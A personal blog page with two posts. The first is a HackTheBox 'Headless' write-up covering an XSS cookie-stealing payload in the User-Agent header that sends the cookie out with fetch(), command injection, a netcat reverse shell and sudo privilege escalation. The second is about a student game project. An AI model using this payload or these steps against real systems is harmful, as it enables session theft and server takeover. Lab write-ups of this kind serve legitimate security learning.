My blog:

  • HackTheBox session, Headless(easy)



    Found two open ports: 22 and 5000, where 5000 was a website.


    Found only two directories: /support(200) and /dashboard(401 Unauthorized)

    When looking at requests in Burpsuite, I found that the Cookie parameter contained Base64 description of the user type, followed by an authentication token. This turned out to be useful later.

    Exploiting XSS

    Attempting xss on a form in /support resulted in a hack attempt warning. This warning read the HTTP headers from the sent request directly, which, ironically, was vulnerable to XSS.

    I set my User-Agent as follows:

    User-Agent: </div><script> fetch('' + btoa(document.cookie));</script><div class="container">

    By using fetch() I got the host to send a request to my python server, where the hosts cookie was included, giving me a admin session token.

    Gaining Initial Access

    Using the retrieved session token, I gained access to the /dashboard, which didn't have a lot of functionality.

    I did some poking using Burpsuite, and found that appending linux commands on the data sent, allowed me to execute commands on the server.

    Using this, I set up a netcat listener and get a reverse shell on the server. I then found the flag by searching for user.txt using the find command.

    Privilege Escalation

    Running sudo -l I found a single file that could be run as root without password; /usr/bin/syscheck

    Analysing this file, I found that it ran a shell file called, which I could edit. I therefore modified this file to include a reverse shell, and ran the syscheck file as root.

    The last step was to find the root flag, which I found by again using the find command.

    Machine link
  • Obama Gaming: Our Agile Journey



    In the subject INF112 on UiB, we where tasked with developing a game. We assembled a team of developers, and brainstormed ideas for our project.

    Project approach:

    We chose a Agile approach, and used tools such as Scrum and Kanban to organise the process.

    User stories

    We had frequent Scrum meetings, where we disgussed our progression and planned new user stories. The user stories helped us to get a grasp on the functionality we wanted in our game. And laid foundation for or next tasks.

    Group dynamics

    The team had good communication through Discord and physical meetings. We also went on a trip over the mountains in Bergen, which strengthened our ability to cooperate even more.

    Technical details

    We used libGDX, which seemed to have fell out of date a while ago. A lot of the reference links where dead, but we managed.

    We tried do separate our project into a Model-View-Controller architecture to follow the STRONG principles. We focused on creating a modular code that allowed us to reused each others work.


    We had a great time working on this project, and we learned a lot about Agile development. We also learned a lot about the importance of good communication and cooperation in a team.

    Project source code